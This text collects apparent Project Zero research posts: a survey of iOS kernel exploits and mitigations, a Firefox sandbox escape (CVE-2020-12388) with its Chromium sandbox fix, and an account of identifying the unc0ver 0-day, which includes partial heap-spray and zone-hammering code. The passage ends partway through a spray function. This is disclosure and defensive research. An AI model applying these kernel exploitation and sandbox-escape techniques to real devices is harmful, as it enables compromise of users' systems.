Subsequent exploit flow: The dangling OSData buffer is reallocated with an OOL ports array and the OSData buffer is freed, leaving a dangling OOL ports array. The OOL ports array is reallocated with another OSData buffer, inserting pointers to the fake task ports sprayed earlier into the OOL ports array. The OOL ports are received, yielding send rights to the fake task ports, and pid_for_task() is used to read pointers to relevant kernel objects. The OSData buffer is freed and reallocated to convert one of the fake ports into a fake kernel task port.

Notes: iOS versions up to 13.1.3 were vulnerable, but the exploit presented here targeted iOS 12.4.1.

The author developed two versions of this exploit: one for non-PAC devices, and one for PAC-enabled devices. The exploit presented here is for PAC-enabled devices.

oob_timestamp - iOS 13.3

By Brandon Azad.

The vulnerability: CVE-2020-3837 is a linear heap out-of-bounds write of up to 8 bytes of timestamp data in IOKit's IOAccelCommandQueue2::processSegmentKernelCommand() due to incorrect bounds checking.

Exploit strategy: The kernel map is groomed to lay out two 96 MB shared memory regions, an 8-page ipc_kmsg, an 8-page OOL ports array, and 80 MB of OSData buffers sprayed via IOSurface properties. The number of bytes to overflow is computed based on the current time and the overflow is triggered to corrupt the ipc_kmsg's ikm_size field, such that the ipc_kmsg now has a size of between 16 pages and 80 MB. The port containing the ipc_kmsg is destroyed, freeing the corrupted ipc_kmsg, the OOL ports array, and some of the subsequent OSData buffers. More OSData buffers are sprayed via IOSurface to reallocate the OOL ports array containing a pointer to a fake Mach port at a hardcoded address that is likely to overlap one of the 96 MB shared memory regions. The OOL ports are received, producing a receive right to a fake Mach port at a known address whose contents can be controlled directly.

Subsequent exploit flow: A kernel memory read primitive is constructed using pid_for_task(). Relevant kernel objects are located and a fake kernel task port is constructed.

Notes: iOS 13 introduced zone_require, a mitigation that checks whether certain objects are allocated from the expected zalloc zone before they are used. An oversight in the implementation led to a trivial bypass when objects are allocated outside of the zalloc_map.

References: oob_timestamp exploit code.

tachy0n (unc0ver 5.0.0) - iOS 13.5

By Pwn20wnd (@Pwn20wnd), unc0ver Team (@unc0verTeam), and Siguza.

The vulnerability: The "LightSpeed" vulnerability (see "Spice" above; reintroduced in iOS 13).

Exploit strategy: (Analysis pending.) The vulnerable function is called in a loop in one thread to repeatedly trigger the vulnerability by allocating a buffer from kalloc.16 and racing to free the buffer twice. Preliminary results suggest that the freed kalloc.16 slot is reallocated by OSData buffers sprayed via IOSurface properties.

Subsequent exploit flow: (Analysis pending.)

Notes: The unc0ver exploit was released as an obfuscated binary; a more complete analysis of the exploit strategy and exploit flow will be released after the tachy0n exploit code is published.

While iOS 12 patched the LightSpeed vulnerability, the patch did not address the root cause and created a memory leak. This memory leak was fixed in iOS 13, but the change also reintroduced the old (vulnerable) behavior. This is a regression, not a variant: the original LightSpeed POC does trigger on iOS 13.

References: LightSpeed, a race for an iOS/macOS sandbox escape, unc0ver-v5.0.0.ipa.

iOS kernel exploit mitigations

Next we will look at some current iOS kernel exploit mitigations. This list is not exhaustive, but it briefly summarizes some of the mitigations that exploit developers may encounter up through iOS 13.

Kernel Stack Canaries - iOS 6

iOS 6 introduced kernel stack canaries (or stack cookies) to protect against stack buffer overflows in the kernel.

None of the exploits in this list are affected by the presence of stack canaries as they do not target stack buffer overflow vulnerabilities.

Kernel ASLR - iOS 6

Kernel Address Space Layout Randomization (Kernel ASLR or KASLR) is a mitigation that randomizes the base address of the kernelcache image in the kernel address space. Before Kernel ASLR was implemented, the addresses of kernel functions and objects in the kernelcache image were always located at a fixed address.

Bypassing or working around KASLR is a standard step of all modern iOS kernel exploits.

Kernel Heap ASLR - iOS 6

Since iOS 6 the base addresses for various kernel heap regions have been randomized. This seeks to mitigate exploits that hardcode addresses at which objects will be deterministically allocated. 

Working around kernel heap randomization is a standard step of modern iOS kernel exploits. Usually this involves heap spraying, in which the kernel is induced to allocate large amounts of data to influence the shape of the heap even when exact addresses are not known. Also, many vulnerabilities can be leveraged to produce an information leak, disclosing the addresses of relevant kernel objects on the heap.

W^X / DEP - iOS 6

iOS 6 also introduced substantial kernel address space hardening by ensuring that kernel pages are mapped either as writable or as executable, but never both (often called "write xor execute" or W^X). This means that page tables no longer map kernel code pages as writable, and the kernel heap and stack are no longer mapped as executable. (Ensuring that non-code data is not mapped as executable is often called Data Execution Prevention, or DEP.)

Modern public iOS exploits do not attempt to bypass W^X (e.g. by modifying page tables and injecting shellcode); instead, exploitation is achieved by modifying kernel data structures and performing code-reuse attacks. This is largely due to the presence of a stronger, hardware-enforced W^X mitigation called KTRR.

PXN - iOS 7

Apple's A7 processor was the first 64-bit, ARMv8-A processor in an iPhone. Previously, iOS 6 had separated the kernel and user address space so that user code and data pages were inaccessible during normal kernel execution. With the move to 64-bit, the address spaces were no longer separated. Thus, the Privileged Execute-Never (PXN) bit was set in page table entries to ensure that the kernel could not execute shellcode residing in userspace pages.

Similarly to W^X, PXN as a protection against jumping to userspace shellcode is overshadowed by the stronger protection of KTRR.

PAN - iOS 10

Privileged access-never (PAN) is an ARMv8.1-A security feature introduced with the Apple A10 processor that prevents the kernel from accessing virtual addresses that are also accessible to userspace. This is used to prevent the kernel from dereferencing attacker-supplied pointers to data structures in userspace. It is similar to the Supervisor Mode Access Prevention (SMAP) feature on some Intel processors.

While PAN has been bypassed before, modern public iOS kernel exploits usually work around PAN by spraying data into the kernel and then learning the address of the data. While the most reliable techniques involve disclosing the address of the data inserted into the kernel, techniques exist to work around PAN generically, such as spraying enough data to overwhelm the kernel map randomization and force a fixed, hardcoded address to be allocated with the controlled data. Other primitives exist for establishing shared memory mappings between userspace and the kernel, which can also be used to work around PAN.

KTRR - iOS 10

KTRR (possibly Kernel Text Readonly Region, part of Kernel Integrity Protection) is a custom hardware security mitigation introduced on the Apple A10 processor (ARMv8.1-A). It is a strong form of W^X protection enforced by the MMU and the memory controller over a single span of contiguous memory covering the read-only parts of the kernelcache image and some sensitive data structures like top-level page tables and the trust cache. It has also been referred to by Apple as Kernel Integrity Protection (KIP) v1.

While KTRR has been publicly bypassed twice before, modern public iOS kernel exploits usually work around KTRR by not manipulating KTRR-protected memory.

APRR - iOS 11

APRR (possibly standing for Access Protection Rerouting or Access Permission Restriction Register) is a custom hardware feature on Apple A11 and later CPUs that indirects virtual memory access permissions (usually specified in the page table entry for the page) through a special register, allowing access permissions for large groups of pages to be changed atomically and per-core. It works by converting the bits in the PTE that typically directly specify the access permissions into an index into a special register containing the true access permissions; changing the register value swaps protections on all pages mapped with the same access permissions index. APRR is somewhat similar to the Memory Protection Keys feature available on newer Intel processors.

APRR on its own does not provide any security boundaries, but it makes it possible to segment privilege levels inside a single address space. It is heavily used by PPL to create a security boundary within the iOS kernel.

PPL - iOS 12

PPL (Page Protection Layer) is the software layer built on APRR and dependent on KTRR that aims to put a security boundary between kernel read/write/execute and direct page table access. The primary goal of PPL is to prevent an attacker from modifying user pages that have been codesigned (e.g. using kernel read/write to overwrite a userspace process's executable code). This necessarily means that PPL must also maintain total control over the page tables and prevent an attacker from mapping sensitive physical addresses, including page tables, page table metadata, and IOMMU registers.

As of May 2020, PPL has not been publicly bypassed. That said, modern iOS kernel exploits are so far unaffected by PPL.

PAC - iOS 12

Pointer Authentication Codes (PAC) is an ARMv8.3-A security feature that mitigates pointer tampering by storing a cryptographic signature of the pointer value in the upper bits of the pointer. Apple introduced PAC with the A12 and significantly hardened the implementation (compared to the ARM standard) in order to defend against attackers with kernel read/write, although for most purposes it is functionally indistinguishable from the standard implementation. Apple's kernel uses PAC for control flow integrity (CFI), placing a security boundary between kernel read/write and kernel code execution.

Despite numerous public bypasses of the iOS kernel's PAC-based CFI, PAC in the kernel is still an effective exploit mitigation: it has severely restricted exploitability of many bugs and killed some exploit techniques. For example, exploits in the past have used a kernel execute primitive in order to build a kernel read/write primitive (see e.g. ziVA); that is no longer possible on A12 without bypassing PAC first. Furthermore, extensive use of PAC-protected pointers in IOKit has made it significantly harder to turn many bugs into useful primitives. Given the long history of serious security issues in IOKit, this is a substantial win.

zone_require - iOS 13

zone_require is a software mitigation introduced in iOS 13 that adds checks that certain pointers are allocated from the expected zalloc zones before using them. The most common zone_require checks in the iOS kernelcache are of Mach ports; for example, every time an ipc_port is locked, the zone_require() function is called to check that the allocation containing the Mach port resides in the ipc.ports zone (and not, for example, an OSData buffer allocated with kalloc()).

Since fake Mach ports are an integral part of modern techniques, zone_require has a substantial impact on exploitation. Vulnerabilities like CVE-2017-13861 (async_wake) that drop a reference on an ipc_port no longer offer a direct path to creating a fake port. While zone_require has been publicly bypassed once, the technique relied on an oversight in the implementation that is easy to correct.

Changelog

2020/07/09
An entry was added for tachy0n (unc0ver 5.0.0) - iOS 13.5.
2020/06/19
The entry on MachSwap was replaced with machswap2, since the latter works on PAN-enabled devices.
An entry was added for AppleAVE2Driver exploit - iOS 12.4.1.
The description for PAN was updated to clarify that it was introduced with the A10 processor, not iOS 10.
The description for PPL was updated to clarify that it primarily protects userspace processes, as the kernel's code is protected by KTRR.
2020/06/11
Original post published.

FF Sandbox Escape (CVE-2020-12388)

17 June 2020 at 15:58
By: Tim

By James Forshaw, Project Zero


In my previous blog post I discussed an issue with the Windows Kernel’s handling of Restricted Tokens which allowed me to escape the Chrome GPU sandbox. Originally I’d planned to use Firefox for the proof-of-concept as Firefox uses the same effective sandbox level as the Chrome GPU process for its content renderers. That means a FF content RCE would give code execution in a sandbox where you could abuse the Windows Kernel Restricted Tokens issue, making it much more serious.

However, while researching the sandbox escape I realized that was the least of FF’s worries.  The use of the GPU level sandbox for multiple processes introduced a sandbox escape vector, even once the Windows issue was fixed. This blog post is about the specific behavior of the Chromium sandbox and why FF was vulnerable. I’ll also detail the changes I made to the Chromium sandbox to introduce a way of mitigating the issue which was used by Mozilla to fix my report.

For reference the P0 issue is 2016 and the FF issue is 1618911. FF defines its own sandboxing profiles, described on this page. The content sandbox at the time of writing is defined as Level 5, so I’ll refer to L5 going forward rather than a GPU sandbox.

Root Cause

The root cause of the issue is that with L5, one content process can open another for full access. In Chromium derived browsers this isn’t usually an issue as only one GPU process is running at a time, although there could be other non-Chromium processes running at the same time which might be accessible. The sandbox used by content renderers in Chromium is significantly more limited and renderers should not be able to open any other processes.

The L5 sandbox uses a Restricted Token as the primary sandbox enforcement. The reason one content process can access another is down to the Default DACL of the Primary Token of the process. For a content process the Default DACL, which is set in RestrictedToken::GetRestrictedToken, grants the following access:

User                       Access
Current User               Full Access
NT AUTHORITY\SYSTEM        Full Access
NT AUTHORITY\RESTRICTED    Full Access
Logon SID                  Read and Execute Access

The Default DACL is used to set the initial Process and Thread Security Descriptors. The Token level used by L5 is USER_LIMITED which disables almost all groups except for:
  • Current User
  • BUILTIN\Users
  • Everyone
  • NT AUTHORITY\INTERACTIVE
  • Logon SID

And adds the following restricted SIDs:
  • BUILTIN\Users
  • Everyone
  • NT AUTHORITY\RESTRICTED
  • Logon SID

Tying all this together, the combination of the Current User group and the RESTRICTED restricted SID results in granting full access to the sandbox Process or Thread.

To understand why being able to open another content process was such a problem, we have to understand how the Chromium sandbox bootstraps a new process. Due to the way Primary Tokens are assigned to a new process, once the process starts the Token can no longer be swapped for a different one. You can do a few things, such as deleting privileges and dropping the Integrity Level, but removing groups or adding new restricted SIDs isn’t possible.

A new sandboxed process needs to do some initial warm up which might require more access than is granted to the restricted sandbox Token, so Chromium uses a trick. It assigns a more privileged Impersonation Token to the initial thread, so that the warmup runs with higher privileges. For L5 the level for the initial Token is USER_RESTRICTED_SAME_ACCESS which just creates a Restricted Token with no disabled groups and all the normal groups added as restricted SIDs. This makes the Token almost equivalent to a normal Token but is considered Restricted. Windows would block setting the Token if the Primary Token is Restricted but the Impersonation Token is not.

The Impersonation Token is dropped once all warmup has completed by calling the LowerToken function in the sandbox target services. What this means is that there’s a time window, from when a new sandbox process starts to when LowerToken is called, where the process is effectively running unsandboxed, except for having a Low IL. If you could hijack execution before the impersonation is dropped you could immediately gain privileges sufficient to escape the sandbox.
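
For reference, this is roughly what the target-side bootstrap looks like with the Chromium sandbox API (a sketch based on the public sandbox interfaces, not Firefox’s actual startup code): everything before LowerToken() runs under the privileged impersonation token.

#include "sandbox/win/src/sandbox.h"

void SandboxTargetMain(sandbox::TargetServices* target_services) {
  if (target_services->Init() != sandbox::SBOX_ALL_OK)
    return;
  // Warmup: open handles, load DLLs, and do anything else that needs the
  // more privileged USER_RESTRICTED_SAME_ACCESS impersonation token.
  target_services->LowerToken();
  // From here on only the restricted (USER_LIMITED) primary token applies.
}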

Simple timeline showing process starting at USER_RESTRICTED_SAME_ACCESS level, transitioning to USER_LIMITED when the token is dropped.

Unlike the Chrome GPU process, FF will spawn new content processes regularly during normal use. Just creating a new tab can spawn a new process. Therefore one compromised content process only has to wait around until a new process is created and then immediately hijack it. A compromised renderer can almost certainly force a new process to be created through an IPC call, but I didn’t investigate that further.

With this knowledge I developed a full POC using many of the same techniques as in the previous blog post. The higher privileges of the USER_RESTRICTED_SAME_ACCESS Token simplifies the exploit. For example we no longer need to hijack the COM Server’s thread as the more privileged Token allows us to directly open the process. Also, crucially we never need to leave the Restricted Sandbox therefore the exploit doesn’t rely on the kernel bug MS fixed for the previous issue. You can find the full POC attached to the issue, and I’ve summarised the steps in the following diagram.

Diagram showing the transitions from a compromised Firefox Content Process, through COM and UI Access to escape the sandbox.

Developing a Fix

In my report I suggested a fix for the issue, enabling the SetLockdownDefaultDacl option in the sandbox policy. SetLockdownDefaultDacl removes both the RESTRICTED and Logon SIDs from the Default DACL which would prevent one L5 process opening another. I had added this sandbox policy function in response to the GPU sandbox escape I mentioned in the previous blog, which was used by lokihardt at Pwn2Own. However the intention was to block the GPU process opening a renderer process and not to prevent one GPU process from opening another. Therefore the policy was not set on the GPU sandbox, but only on renderers.

It turns out that I wasn’t the first person to report the ability of one FF content process opening another. Niklas Baumstark had reported it a year prior to my report. The fix I had suggested, enabling SetLockdownDefaultDacl, had already been tried in response to Niklas’ report: it broke various things, including the DirectWrite cache and audio playback, and caused significant performance regressions, which made applying SetLockdownDefaultDacl undesirable. The reason things such as the DirectWrite cache break is a typical coding pattern in Windows RPC services, shown below:

int RpcCall(handle_t handle, LPCWSTR some_value) {
  DWORD pid;
  I_RpcBindingInqLocalClientPID(handle, &pid);

  RpcImpersonateClient(handle);
  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
  if (!process)
    return ERROR_ACCESS_DENIED;

  ...
}

This example code is running in a privileged service and is called over RPC by the sandboxed application. It first calls the RPC runtime to query the caller’s Process ID. Then it impersonates the caller and tries to open a handle to the calling process. If opening the process fails then the RPC call returns an access denied error.

For normal applications it’s a perfectly reasonable assumption that the caller can access its own process. However, once we lockdown the process security this is no longer the case. If we’re blocking access to other processes at the same level then as a consequence we also block opening our own process. Normally this isn’t an issue as most code inside the process uses the Current Process Pseudo handle which never goes through an access check.

Niklas’ report didn’t come with a full sandbox escape. The lack of a full POC plus the difficulty in fixing it resulted in the fix stalling. However, with a full sandbox escape demonstrating the impact of the issue, Mozilla would have to choose between performance and security unless another fix could be implemented. As I’m a Chromium committer as well as an owner of the Windows sandbox, I realized I might be better placed to fix this than Mozilla, who relied on our code.

The fix must do two things:
  • Grant the process access to its own process and threads.
  • Deny any other process at the same level.

Without administrator privileges many angles, such as Kernel Process Callbacks, are not available to us. The fix must be entirely in user-mode with normal user privileges.

The key to the fix is that the list of restricted SIDs can include SIDs which are not present in the Token's existing groups. We can generate a random SID per sandbox process which is added both as a restricted SID and into the Default DACL. We can then use SetLockdownDefaultDacl to lockdown the Default DACL.

When opening the process the access check will match on the Current User SID for the normal check, and the Random SID for the restricted SID check. This will also work over RPC. However, each content process will have a different Random SID, so while the normal check will still pass, the access check can’t successfully pass the restricted SID check. This achieves our goals. You can check the implementation in PolicyBase::MakeTokens.
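
From the broker’s perspective the mitigation then amounts to a couple of policy calls when configuring a sandboxed process. The snippet below is a rough sketch using the Chromium sandbox policy method names as I understand them; treat the exact names and return types as illustrative rather than a precise API reference.

#include "sandbox/win/src/sandbox.h"
#include "sandbox/win/src/sandbox_policy.h"

// Rough sketch of a broker opting in to the mitigation for an L5-style
// (GPU-level) sandboxed process.
scoped_refptr<sandbox::TargetPolicy> MakeLockedDownL5Policy(
    sandbox::BrokerServices* broker_services) {
  scoped_refptr<sandbox::TargetPolicy> policy = broker_services->CreatePolicy();
  policy->SetTokenLevel(sandbox::USER_RESTRICTED_SAME_ACCESS,
                        sandbox::USER_LIMITED);
  policy->SetLockdownDefaultDacl();    // remove RESTRICTED and Logon SIDs
  policy->AddRestrictingRandomSid();   // per-process random SID in both the
                                       // restricted SID list and the DACL
  return policy;
}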

I added the patch to the Chromium repository and FF was able to merge it and test it. It worked to block the attack vector as well as seemingly not introducing the previous performance issues. I say, “seemingly,” as part of the problem with any changes such as this is that it’s impossible to know for certain that some RPC service or other code doesn’t rely on specific behaviors to function which a change breaks. However, this code is now shipping in FF76 so no doubt it’ll become apparent if there are issues. 

Another problem with the fix is it’s opt-in, to be secure every other process on the system has to opt in to the mitigation including all Chromium browsers as well as users of Chromium such as Electron. For example, if Chrome isn’t updated then a FF content process could kill Chrome’s GPU process, that would cause Chrome to restart it and the FF process could escape via Chrome by hijacking the new GPU process. This is why, even though not directly vulnerable, I enabled the mitigation on the Chromium GPU process which has shipped in M83 (and Microsoft Edge 83) released at the end of April 2020.

In conclusion, this blog post demonstrated a sandbox escape in FF which required adding a new feature to the Chromium sandbox. In contrast to the previous blog post it was possible to remediate the issue without requiring a change in Windows code that FF or Chromium don’t have access to. That said, it’s likely we were lucky that it was possible to change without breaking anything important. Next time it might not be so easy.

How to unc0ver a 0-day in 4 hours or less

9 July 2020 at 16:04
By: Tim
By Brandon Azad, Project Zero

At 3 PM PDT on May 23, 2020, the unc0ver jailbreak was released for iOS 13.5 (the latest signed version at the time of release) using a zero-day vulnerability and heavy obfuscation. By 7 PM, I had identified the vulnerability and informed Apple. By 1 AM, I had sent Apple a POC and my analysis. This post takes you along that journey.

Initial identification

I wanted to find the vulnerability used in unc0ver and report it to Apple quickly in order to demonstrate that obfuscating an exploit does little to prevent the bug from winding up in the hands of bad actors.

After downloading and extracting the unc0ver IPA, I loaded the main executable into IDA to take a look. Unfortunately, the binary was heavily obfuscated, so finding the bug statically was beyond my abilities.

Image showing a screenshot of IDA Pro with heavily obfuscated code


Next I loaded the unc0ver app onto an iPod Touch 7 running iOS 13.2.3 to try running the exploit. Exploring the app interface didn't suggest that the user had any sort of control over which vulnerability was used to exploit the device, so I hoped that unc0ver only had support for the one 0-day and did not use the oob_timestamp bug instead on iOS 13.3 and lower.

As I was clicking the "Jailbreak" button, a thought occurred to me: Having written a few kernel exploits before, I understood that most memory-corruption-based exploits have something of a "critical section" during which kernel state has been corrupted and the system would be unstable if the rest of the exploit did not continue. So, on a whim, I double clicked the home button to bring up the app switcher and killed the unc0ver app.

The device immediately panicked.

panic(cpu 1 caller 0xfffffff020e75424): "Zone cache element was used after free! Element 0xffffffe0033ac810 was corrupted at beginning; Expected 0x87be6c0681be12b8 but found 0xffffffe003059d90; canary 0x784193e68284daa8; zone 0xfffffff021415fa8 (kalloc.16)"
Debugger message: panic
Memory ID: 0x6
OS version: 17B111
Kernel version: Darwin Kernel Version 19.0.0: Wed Oct  9 22:41:51 PDT 2019; root:xnu-6153.42.1~1/RELEASE_ARM64_T8010
KernelCache UUID: 5AD647C26EF3506257696CF29419F868
Kernel UUID: F6AED585-86A0-3BEE-83B9-C5B36769EB13
iBoot version: iBoot-5540.40.51
secure boot?: YES
Paniclog version: 13
Kernel slide:     0x0000000019cf0000
Kernel text base: 0xfffffff020cf4000
mach_absolute_time: 0x3943f534b
Epoch Time:        sec       usec
  Boot    : 0x5ec9b036 0x0004cf8d
  Sleep   : 0x00000000 0x00000000
  Wake    : 0x00000000 0x00000000
  Calendar: 0x5ec9b138 0x0004b68b

Panicked task 0xffffffe0008a4800: 9619 pages, 230 threads: pid 222: unc0ver
Panicked thread: 0xffffffe004303a18, backtrace: 0xffffffe00021b2f0, tid: 4884
  lr: 0xfffffff007135e70  fp: 0xffffffe00021b330
  lr: 0xfffffff007135cd0  fp: 0xffffffe00021b3a0
  lr: 0xfffffff0072345c0  fp: 0xffffffe00021b450
  lr: 0xfffffff0070f9610  fp: 0xffffffe00021b460
  lr: 0xfffffff007135648  fp: 0xffffffe00021b7d0
  lr: 0xfffffff007135990  fp: 0xffffffe00021b820
  lr: 0xfffffff0076e1ad4  fp: 0xffffffe00021b840
  lr: 0xfffffff007185424  fp: 0xffffffe00021b8b0
  lr: 0xfffffff007182550  fp: 0xffffffe00021b9e0
  lr: 0xfffffff007140718  fp: 0xffffffe00021ba30
  lr: 0xfffffff0074d5bfc  fp: 0xffffffe00021ba80
  lr: 0xfffffff0074d5d90  fp: 0xffffffe00021bb40 
  lr: 0xfffffff0075f10d0  fp: 0xffffffe00021bbd0
  lr: 0xfffffff00723468c  fp: 0xffffffe00021bc80
  lr: 0xfffffff0070f9610  fp: 0xffffffe00021bc90
  lr: 0x00000001bf085ae4  fp: 0x0000000000000000

This seemed promising! I had a panic message saying there was a use-after-free in the kalloc.16 allocation zone (general purpose allocations of size up to 16 bytes). However, it was possible that this was a symptom of the memory corruption rather than the source of the memory corruption (or even a decoy!). To investigate further, I'd need to analyze the backtrace.

While waiting for IDA to process the iPod's kernelcache, I tried a few more off-the-cuff experiments. Since many exploits use Mach ports as a fundamental primitive, I wrote an app that would churn up the ipc.ports zone, creating fragmentation and mixing up the freelist. When I ran the unc0ver app afterwards the exploit still worked, suggesting that it may not rely on heap grooming of Mach port allocations.
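
A sketch of one way such a churn app could look (illustrative, not the actual code): allocate a large number of receive rights and free a random subset so the ipc.ports freelist is shuffled and the zone is fragmented.

#include <mach/mach.h>
#include <stdlib.h>
#include <vector>

static void churn_ipc_ports(size_t count) {
    std::vector<mach_port_t> ports(count, MACH_PORT_NULL);
    for (size_t i = 0; i < count; i++)
        mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]);
    // Destroy roughly half of the ports at random, leaving holes throughout
    // the ipc.ports zone and mixing up the freelist order.
    for (size_t i = 0; i < count; i++)
        if (rand() & 1)
            mach_port_destroy(mach_task_self(), ports[i]);
}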

Next, since the panic log mentioned kalloc.16, I decided to write an app that would continuously allocate and free to kalloc.16 in the background during the unc0ver exploit. The idea was that if unc0ver relies on reallocating a kalloc.16 allocation, then my app might grab that slot instead, which would likely cause the exploit strategy to fail and possibly result in a kernel panic. And sure enough, with my app hammering kalloc.16 in the background,  touching the "Jailbreak" button caused an immediate kernel panic.
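
One plausible shape for such a kalloc.16 hammer (again illustrative, not the actual code): repeatedly send and receive a Mach message carrying a two-entry out-of-line ports descriptor, since the in-transit copy of that array is a 16-byte kernel allocation.

#include <mach/mach.h>
#include <string.h>

// Each iteration allocates a kalloc.16 buffer in the kernel (the in-transit
// copy of the 2-entry OOL ports array) and frees it again on receive, so
// calling this in a tight loop on a few threads churns the zone.
static void churn_kalloc16_once(mach_port_t holder /* receive right we own */) {
    struct {
        mach_msg_header_t hdr;
        mach_msg_body_t body;
        mach_msg_ool_ports_descriptor_t ool;
    } msg;
    mach_port_t ports[2] = { MACH_PORT_NULL, MACH_PORT_NULL };

    memset(&msg, 0, sizeof(msg));
    msg.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) |
                        MACH_MSGH_BITS_COMPLEX;
    msg.hdr.msgh_remote_port = holder;
    msg.hdr.msgh_size = sizeof(msg);
    msg.body.msgh_descriptor_count = 1;
    msg.ool.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
    msg.ool.address = ports;
    msg.ool.count = 2;                       // 2 * 8 bytes -> kalloc.16
    msg.ool.disposition = MACH_MSG_TYPE_MAKE_SEND;
    msg.ool.deallocate = FALSE;
    mach_msg(&msg.hdr, MACH_SEND_MSG, sizeof(msg), 0, MACH_PORT_NULL,
             MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    struct {
        mach_msg_header_t hdr;
        mach_msg_body_t body;
        mach_msg_ool_ports_descriptor_t ool;
        mach_msg_trailer_t trailer;
    } rcv;
    memset(&rcv, 0, sizeof(rcv));
    if (mach_msg(&rcv.hdr, MACH_RCV_MSG, 0, sizeof(rcv), holder,
                 MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL) != MACH_MSG_SUCCESS)
        return;
    // Clean up the copied-out port name array in our address space.
    if (rcv.ool.address != NULL)
        vm_deallocate(mach_task_self(), (vm_address_t)rcv.ool.address,
                      rcv.ool.count * sizeof(mach_port_name_t));
}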

As a sanity check, I tried changing my app to hammer a different zone, kalloc.32, instead of kalloc.16. This time the exploit ran successfully, suggesting that kalloc.16 is indeed the critical allocation zone used by the exploit.

Finally, once IDA had finished analyzing the iPod kernelcache, I started symbolicating the stacktraces collected from the panic logs.

Panicked task 0xffffffe0008a4800: 9619 pages, 230 threads: pid 222: unc0ver
Panicked thread: 0xffffffe004303a18, backtrace: 0xffffffe00021b2f0, tid: 4884
  lr: 0xfffffff007135e70
  lr: 0xfffffff007135cd0
  lr: 0xfffffff0072345c0
  lr: 0xfffffff0070f9610
  lr: 0xfffffff007135648
  lr: 0xfffffff007135990
  lr: 0xfffffff0076e1ad4  # _panic
  lr: 0xfffffff007185424  # _zcache_alloc_from_cpu_cache
  lr: 0xfffffff007182550  # _zalloc_internal
  lr: 0xfffffff007140718  # _kalloc_canblock
  lr: 0xfffffff0074d5bfc  # _aio_copy_in_list
  lr: 0xfffffff0074d5d90  # _lio_listio
  lr: 0xfffffff0075f10d0  # _unix_syscall
  lr: 0xfffffff00723468c  # _sleh_synchronous
  lr: 0xfffffff0070f9610  # _fleh_synchronous
  lr: 0x00000001bf085ae4

The call to lio_listio() immediately stood out to me. Not long before, I had finished writing a survey of recent iOS kernel exploits, and I happened to remember that lio_listio() was the vulnerable syscall used in the LightSpeed-based exploits. I reread the blog post from Synacktiv to get a sense of the bug and immediately another piece fell into place: the target object that is double-freed in the LightSpeed race is an aio_lio_context object that lives in kalloc.16. Also, the large number of threads in the unc0ver app further supported the idea of a race condition.

At this point I felt I had enough evidence to reach out to Apple with a preliminary analysis suggesting that the bug was LightSpeed, either a variant or a regression. 

Confirmation and POC

Next I wanted to confirm the bug by writing a POC to trigger the issue. I tried the original POC shown in the LightSpeed blog post, but after a minute of running it hadn't yet panicked. This suggested to me that perhaps the 0-day was a variant of the original LightSpeed bug.

To find out more, I started two lines of investigation: looking at the XNU sources to try and spot the bug, and using checkra1n/pongoOS to patch lio_listio() in the kernelcache and then running the exploit. From the sources I couldn't see how the original vulnerability was fixed at all, which didn't make sense to me. So instead I focused my effort on kernel patching.

Booting a patched kernelcache is tricky but doable because of checkm8. I downloaded checkra1n and booted the iPod into the pongoOS shell. Using the example from the pongoOS repo as a guide, I created a loadable pongo module that would disable the checkra1n kernel patches and instead apply my own patches. (I disabled the checkra1n kernel patches because I was worried that unc0ver would detect checkra1n and engage anti-analysis measures.)

My first test was just to insert invalid instruction opcodes into the lio_listio() function so that it would panic if called. Surprisingly, the device booted just fine, and then once I clicked "Jailbreak" it panicked. This meant that unc0ver was the only process calling lio_listio().

I next patched the code responsible for allocating the aio_lio_context object that is double-freed in the original LightSpeed bug so that it would be allocated from kalloc.48 instead of kalloc.16:

FFFFFFF0074D5D54     MOV     W8, #0xC ; patched to #0x23
FFFFFFF0074D5D58     STR     X8, [SP,#0x40] ; alloc size
FFFFFFF0074D5D5C     ADRL    X2, _lio_listio.site.5
FFFFFFF0074D5D64     ADD     X0, SP, #0x40
FFFFFFF0074D5D68     MOV     W1, #1 ; can block
FFFFFFF0074D5D6C     BL      kalloc_canblock
FFFFFFF0074D5D70     CBZ     X0, loc_FFFFFFF0074D6234
FFFFFFF0074D5D74     MOV     X19, X0 ; lio_context
FFFFFFF0074D5D78     MOV     W1, #0xC ; size_t
FFFFFFF0074D5D7C     BL      _bzero

The idea is that increasing the object's allocation size will cause unc0ver's exploit strategy to fail because it will try to replace the accidentally-freed kalloc.48 context object with a replacement object from kalloc.16, which simply cannot occur. And sure enough, with this patch in place, unc0ver stalled at the "Exploiting kernel" step without actually panicking.

I then ran a few more experiments patching various points in the function to dump the arguments and data buffers passed to lio_listio() so that I could compare against the values used in the original LightSpeed POC. The idea was that if I noticed any substantial differences, that would point me in the direction of the variant in the source. However, other than the field aio_reqprio being set to 'gang', there were no differences between the arguments passed to lio_listio() by unc0ver and those in the original POC.

At this point it looked like the 0-day might actually be the original LightSpeed bug itself, not a variant, so I returned to the original POC to see if perhaps the reason it wasn't triggering was that a specific technique used had been mitigated. The code responsible for reallocating the kalloc.16 allocation caught my eye:

/* not mandatory but used to make the race more likely */
/* this poll() will force a kalloc16 of a struct poll_continue_args */
/* with its second dword as 0 (to collide with lio_context->io_issued == 0) */
/* this technique is quite slow (1ms waiting time) and better ways to do so exists */
int n = poll(NULL, 0, 1);

I hadn't ever seen poll() used as a reallocation primitive before. Intuitively it felt like using Mach port based reallocation strategies was more promising, so I replaced this code with an out-of-line Mach ports spray copied from oob_timestamp. Sure enough, that was the only change required to make the POC trigger reliably in a few seconds.
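For reference, the general shape of such a spray is sketched below. This is a simplified approximation rather than the actual oob_timestamp code, and the function name is made up: it reuses the ool_ports_msg layout from the earlier hammer sketch, raises the destination port's queue limit, and keeps many messages queued so that each one pins a 16-byte ports array in kalloc.16 until the port is destroyed.

// Simplified sketch of a kalloc.16 replacement spray via out-of-line Mach
// ports descriptors (not the actual oob_timestamp code). "msg" is the same
// ool_ports_msg from the earlier sketch, with ool_ports.count == 2.
static mach_port_t spray_kalloc16(struct ool_ports_msg *msg, unsigned count) {
    mach_port_t holder = MACH_PORT_NULL;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &holder);
    mach_port_insert_right(mach_task_self(), holder, holder,
                           MACH_MSG_TYPE_MAKE_SEND);

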